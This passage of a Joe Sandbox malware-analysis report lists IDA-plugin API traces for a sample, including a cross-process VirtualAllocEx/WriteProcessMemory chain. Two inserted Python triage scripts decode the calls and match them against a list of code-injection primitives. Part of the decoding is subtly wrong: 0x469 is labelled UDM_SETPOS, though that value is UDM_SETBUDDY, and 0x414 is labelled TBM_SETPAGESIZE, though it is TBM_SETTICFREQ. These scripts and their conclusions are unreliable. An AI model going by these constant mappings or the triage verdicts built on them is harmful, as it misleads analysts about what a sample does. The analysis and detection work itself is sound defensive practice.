• Opcode ID: 24b753e3cba72a06474195f63a486c970e2555d6a468fe638a19bf3952e240bb
• Instruction ID: 149e6e2bb73675ebbf0775450777aaf591786fb1db29715e8be02db9f09b3f67
• Opcode Fuzzy Hash: 24b753e3cba72a06474195f63a486c970e2555d6a468fe638a19bf3952e240bb
• Instruction Fuzzy Hash: E6A126356043019FCB14DF14C584E5ABBE5BF89320F14895DF995AB3A2CB32EC46DB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00EE32ED
                                                                                                                                                                                                                                                        • Part of subcall function 00EEE0D0: __87except.LIBCMT ref: 00EEE10B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorHandling__87except__start
                                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                                      • API String ID: 2905807303-2276729525
                                                                                                                                                                                                                                                      • Opcode ID: b6c8552006f43364e460b9dee7075ac529e8387206f0b1d39dae2e30aa7d02ab
                                                                                                                                                                                                                                                      • Instruction ID: b0607cb5656eaa0017c9b5f485f204b2ff94aecfa0177b9f1a2185ea02cc75cd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6c8552006f43364e460b9dee7075ac529e8387206f0b1d39dae2e30aa7d02ab
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D518C31A0928D92CB157B36C9057BA3BD49B45715F20BD28F1D5A33F9EF348DC8A642
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00F5DC50,?,0000000F,0000000C,00000016,00F5DC50,?), ref: 00F04645
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00F046C5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharUpper$__itow__swprintf
                                                                                                                                                                                                                                                      • String ID: REMOVE$THIS
                                                                                                                                                                                                                                                      • API String ID: 3797816924-776492005
                                                                                                                                                                                                                                                      • Opcode ID: 01978ef85a1803bd32e33f586e93656a2add85644bbd85f1d49697a92d439f1c
                                                                                                                                                                                                                                                      • Instruction ID: c80515c3fc9ee5bf7b252be5dce08dc5800d53b46cf7e5904eb11bdb1c2a3db7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01978ef85a1803bd32e33f586e93656a2add85644bbd85f1d49697a92d439f1c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B418075A002099FCF00DF54C985AADB7F4FF45314F148069EA16AB392DB35ED42EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F0430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EFBC08,?,?,00000034,00000800,?,00000034), ref: 00F04335
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EFC1D3
                                                                                                                                                                                                                                                        • Part of subcall function 00F042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EFBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00F04300
                                                                                                                                                                                                                                                        • Part of subcall function 00F0422F: GetWindowThreadProcessId.USER32(?,?), ref: 00F0425A
                                                                                                                                                                                                                                                        • Part of subcall function 00F0422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EFBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F0426A
                                                                                                                                                                                                                                                        • Part of subcall function 00F0422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EFBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F04280
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EFC240
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EFC28D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: 17fbbce9a5debf5e2e2b0e69043b4f837cb61126f74777dc29ab224b19b8ad72
                                                                                                                                                                                                                                                      • Instruction ID: 01b88922035170b890ec0719c95a03b3043d852c0887eada415cb4566fbb6b2a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17fbbce9a5debf5e2e2b0e69043b4f837cb61126f74777dc29ab224b19b8ad72
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 204139B6A0021CAFDB10DFA4CD81AEEB7B8EF09300F104099FA45B7191DA757E45EB61
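Triage note for the function entry above (added here as an editor's worked example; it is not part of the Joe Sandbox report and not code from the analysed sample). The API chain GetWindowThreadProcessId -> OpenProcess(0x438) -> VirtualAllocEx(MEM_COMMIT, PAGE_READWRITE) -> WriteProcessMemory -> SendMessageW -> ReadProcessMemory is the standard way to exchange an item structure with a common control that lives in another process, and it is also exactly the shape that generic "writes to foreign memory regions" heuristics match. Two details separate the benign reading from code injection: the allocation is PAGE_READWRITE (0x4) rather than PAGE_EXECUTE_READWRITE, and no execution primitive (CreateRemoteThread, SetThreadContext, QueueUserAPC or their Nt* equivalents) appears in this entry. The script below parses the report's own API lines, decodes the OpenProcess access mask (0x438 = PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION), the VirtualAllocEx protection and the SendMessageW message IDs, and returns a verdict. Assumptions: the message IDs are decoded as tree-view messages (TV_FIRST = 0x1100, so 0x1104 = TVM_GETITEMRECT and 0x1111 = TVM_HITTEST); the 0x1000 range is shared by ListView, MonthCal and DateTime controls and is therefore left undecoded, and the verdict names and the `triage` helper are this example's own, not report terminology.

```python
import re

# Constructed sample input: the "APIs" lines of the function entry above, copied as they
# appear in the report. The parser relies only on the "Name.MODULE(args), ref: addr" shape.
SAMPLE_APIS = """\
• Part of subcall function 00F0430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EFBC08,?,?,00000034,00000800,?,00000034), ref: 00F04335
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EFC1D3
• Part of subcall function 00F042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EFBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00F04300
• Part of subcall function 00F0422F: GetWindowThreadProcessId.USER32(?,?), ref: 00F0425A
• Part of subcall function 00F0422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EFBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F0426A
• Part of subcall function 00F0422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EFBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F04280
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EFC240
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EFC28D
"""

CALL_RE = re.compile(
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Subset of the PROCESS_* access rights from winnt.h, enough to decode 0x438.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Tree-view messages (commctrl.h, TV_FIRST = 0x1100). Assumption: the target is a tree-view;
# the 0x1000 range is shared by several controls and is deliberately not decoded here.
TREEVIEW_MSG = {0x1104: "TVM_GETITEMRECT", 0x1111: "TVM_HITTEST"}

# APIs that would turn a cross-process write into code execution. None appear in this entry.
EXEC_PRIMITIVES = {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread",
                   "SetThreadContext", "NtSetContextThread", "QueueUserAPC", "NtQueueApcThread"}


def parse_apis(text):
    """Return [(name, module, [arg or None, ...], ref)] for each call line; '?' becomes None."""
    calls = []
    for m in CALL_RE.finditer(text):
        args = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None
                for a in m.group("args").split(",")]
        calls.append((m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_flags(mask, table):
    """Expand a bit mask into the flag names from `table`, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if mask & bit]


def triage(text):
    """Classify a function entry's API list as injection, control marshalling or plain write."""
    calls = parse_apis(text)
    names = {c[0] for c in calls}
    result = {"open_access": [], "alloc_protect": None, "messages": [],
              "execution_primitive": bool(names & EXEC_PRIMITIVES)}
    for name, _module, args, _ref in calls:
        if name == "OpenProcess" and args and args[0] is not None:
            result["open_access"] = decode_flags(args[0], PROCESS_ACCESS)
        elif name == "VirtualAllocEx" and len(args) > 4 and args[4] is not None:
            result["alloc_protect"] = PAGE_PROTECT.get(args[4], hex(args[4]))  # flProtect
        elif name == "SendMessageW" and len(args) > 1 and args[1] is not None:
            result["messages"].append(TREEVIEW_MSG.get(args[1], hex(args[1])))  # uMsg
    writes = {"VirtualAllocEx", "WriteProcessMemory"} <= names
    if writes and result["execution_primitive"]:
        result["verdict"] = "remote-code-injection"
    elif writes and result["alloc_protect"] == "PAGE_READWRITE" and result["messages"]:
        # Non-executable buffer plus a common-control message: a struct handed to a control.
        result["verdict"] = "commctrl-marshalling"
    elif writes:
        result["verdict"] = "cross-process-write"
    else:
        result["verdict"] = "none"
    return result


if __name__ == "__main__":
    for key, value in triage(SAMPLE_APIS).items():
        print(f"{key}: {value}")
```

The verdict is a triage aid, not a clean bill: the same allocation and write primitives serve process hollowing, so the deciding evidence for this entry is the absence of any thread-creation or context-setting call and the non-executable page protection, and both should be re-checked against the full API trace rather than a single function's list.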
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F5DC00,00000000,?,?,?,?), ref: 00F2A6D8
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32 ref: 00F2A6F5
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F2A705
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                      • Opcode ID: 2449a60458cbf7f308fd204c4df7a7b418e2d75ba3f9baa0156bb1a7c6eac1de
                                                                                                                                                                                                                                                      • Instruction ID: 7a17d39c49ec64e4ab52f12a4ca63932671af2b309e545cf16bdd0550f5cb09c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2449a60458cbf7f308fd204c4df7a7b418e2d75ba3f9baa0156bb1a7c6eac1de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D31E131601219AFDB118F38DC45BEA7BA9FB49334F244325F975A32E0D730E851AB54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F2A15E
                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F2A172
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F2A196
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                      • Opcode ID: d9e20da176bbad929fa6b3b3765762579bcb532810c17569507e24758d888b7c
                                                                                                                                                                                                                                                      • Instruction ID: c2c7fd0605fb6f99369d467d0d39b4cb75f1b9aced0c7269df16f9a17e75111e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9e20da176bbad929fa6b3b3765762579bcb532810c17569507e24758d888b7c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD219F32510228BBDF158F94DC42FEA3B79EF48724F110214FE556B1D0D6B5AC61EB90
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F2A941
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F2A94F
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F2A956
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: 214b96b01c4f89b9b915f582e8b7d9c9cf5a2aae9da64b68669f832a183d0e63
• Instruction ID: 528deed1e525a1491013011079fdd4956a22fb45b31bd6f0cf671b3319e1a3b4
• Opcode Fuzzy Hash: 214b96b01c4f89b9b915f582e8b7d9c9cf5a2aae9da64b68669f832a183d0e63
• Instruction Fuzzy Hash: 3F21CFB5600219AFDB00DF28DC91DB737ACEF5A3A4B050159FA049B3A1DB30EC52EB61
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F29A30
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F29A40
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F29A65
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: 1d481cc3f8b7b277fbf6cd37bb281b388c45d580db767e37c1b13ce7c488b00f
• Instruction ID: 8266ece6c0b41d999f425a982c7a7e26573ee3bf223c7fccc5875f2d32402672
• Opcode Fuzzy Hash: 1d481cc3f8b7b277fbf6cd37bb281b388c45d580db767e37c1b13ce7c488b00f
• Instruction Fuzzy Hash: AE21F532A04128BFDF118F54DC85FBB3BAAEF8A760F018129F94457190C6B59C51ABA0
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F2A46D
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F2A482
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F2A48F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: ee6bec7fda1e9aec81dfb5187030d884216079c3b394b8c3e264bf3874c6f0d9
• Instruction ID: a01db15dc7387ed2765475bb41094252c55f1b28b47d563e88e78eb5562c8983
• Opcode Fuzzy Hash: ee6bec7fda1e9aec81dfb5187030d884216079c3b394b8c3e264bf3874c6f0d9
• Instruction Fuzzy Hash: 6511E771600218BFEF209F64DC45FAB37A9EF89764F114218FA45A60A1D2B1E811E720
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00EE2350,?), ref: 00EE22A1
• GetProcAddress.KERNEL32(00000000), ref: 00EE22A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 2574300362-340411864
• Opcode ID: e87325dc94474d51c402455be494459e05a74ba5b7aaf04bcaf356b49a1d6524
• Instruction ID: 0562ec349b602c2dfea56fbcce7504988aab545c099bf88aea494add9d5e0f0d
• Opcode Fuzzy Hash: e87325dc94474d51c402455be494459e05a74ba5b7aaf04bcaf356b49a1d6524
• Instruction Fuzzy Hash: 13E01A74690708ABDB905F71EC4EB6A3A68BB5571AF414424F602E50B0DFB98088FF05
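The SendMessageW blocks above (msctls_updown32, Listbox, msctls_trackbar32) and the combase.dll/RoInitialize block list raw message numbers and flag values, which is how the IDA plugin records them. The following decoder is an added example, not part of the Joe Sandbox report or of the sample; it resolves those values to their public Win32 names so a reviewer can see at a glance that these routines configure common controls and resolve a WinRT entry point. The sample API lines are copied from this page; the message tables are the standard constants from CommCtrl.h and WinUser.h; the message family is chosen from the class name the block's String ID names; and reading these routines as the AutoIt runtime's GUI helpers (consistent with the report's "compiled AutoIt script" signature) is this example's inference, not something the report states.

```python
"""Decode SendMessageW / LoadLibraryExW call sites from Joe Sandbox IDA-plugin API lines.

Constructed input: the API lines below are copied from the function blocks on this page.
Message-name tables are the public Win32 constants (CommCtrl.h / WinUser.h). The
class-name -> message-family mapping is this example's assumption.
"""
import re

WM_USER = 0x400

# Message families keyed by the window class each block's String ID names.
MESSAGE_TABLES = {
    "msctls_updown32": {
        WM_USER + 101: "UDM_SETRANGE",   # lParam = MAKELONG(nUpper, nLower)
        WM_USER + 105: "UDM_SETPOS",
    },
    "Listbox": {
        0x180: "LB_ADDSTRING",
        0x186: "LB_SETCURSEL",
    },
    "msctls_trackbar32": {
        WM_USER + 5: "TBM_SETPOS",
        WM_USER + 6: "TBM_SETRANGE",     # lParam = MAKELONG(lMinimum, lMaximum)
        WM_USER + 20: "TBM_SETPAGESIZE",
    },
}

# Only the flag seen on this page; 0x800 restricts the search to %windir%\system32.
LOAD_LIBRARY_FLAGS = {0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32"}

# "• Func.MODULE(args), ref: ADDRESS" as rendered by the IDA plugin.
API_LINE = re.compile(r"• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-F]{8})$")


def lo_hi(value):
    """Inverse of MAKELONG: LOWORD and HIWORD of a 32-bit LPARAM as signed 16-bit ints."""
    sign = lambda w: w - 0x10000 if w & 0x8000 else w
    return sign(value & 0xFFFF), sign((value >> 16) & 0xFFFF)


def decode_block(class_name, api_lines):
    """Return one decoded line per API call, naming messages and LoadLibraryExW flags."""
    out = []
    for line in api_lines:
        m = API_LINE.match(line.strip())
        if not m:
            continue  # not an API line (e.g. a header); skip
        func, module, argstr, ref = m.groups()
        args = [a.strip() for a in argstr.split(",")]
        if func == "SendMessageW":
            msg = int(args[1], 16)
            name = MESSAGE_TABLES.get(class_name, {}).get(msg, f"0x{msg:X}")
            detail = name
            # Range messages pack both bounds into lParam; show them when recorded.
            if name in ("UDM_SETRANGE", "TBM_SETRANGE") and args[3] != "?":
                lo, hi = lo_hi(int(args[3], 16))
                detail += f"(lo={lo}, hi={hi})"
            out.append(f"{ref}: {func} {class_name} {detail}")
        elif func == "LoadLibraryExW":
            flags = int(args[2], 16)
            names = [n for f, n in LOAD_LIBRARY_FLAGS.items() if flags & f] or [hex(flags)]
            out.append(f"{ref}: {func} {args[0]} flags={'|'.join(names)} -> resolves {args[3]}")
        else:
            out.append(f"{ref}: {func}.{module}")
    return out


# Constructed sample: the API lines of the blocks above, keyed by their String ID.
SAMPLE_BLOCKS = {
    "msctls_updown32": [
        "• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F2A941",
        "• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F2A94F",
    ],
    "Listbox": [
        "• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F29A30",
        "• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F29A40",
    ],
    "msctls_trackbar32": [
        "• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F2A46D",
        "• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F2A482",
        "• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F2A48F",
    ],
    "combase.dll": [
        "• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00EE2350,?), ref: 00EE22A1",
    ],
}


def decode_all(blocks=SAMPLE_BLOCKS):
    return {cls: decode_block(cls, lines) for cls, lines in blocks.items()}


if __name__ == "__main__":
    for cls, rows in decode_all().items():
        print(cls)
        for row in rows:
            print("  " + row)
```

Two things the decoded output makes visible that the raw numbers do not: the up-down control is given the range 32767 to -32767 and the trackbar the range 0 to 100, which are ordinary control defaults rather than anything sample-specific; and combase.dll is loaded with LOAD_LIBRARY_SEARCH_SYSTEM32, so this particular LoadLibraryExW is not a DLL search-order hijack vector. None of the behaviour the report flags (process hollowing, thread injection, VM checks) is in these routines, so they can be deprioritised during triage.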
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EE2276), ref: 00EE2376
• GetProcAddress.KERNEL32(00000000), ref: 00EE237D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
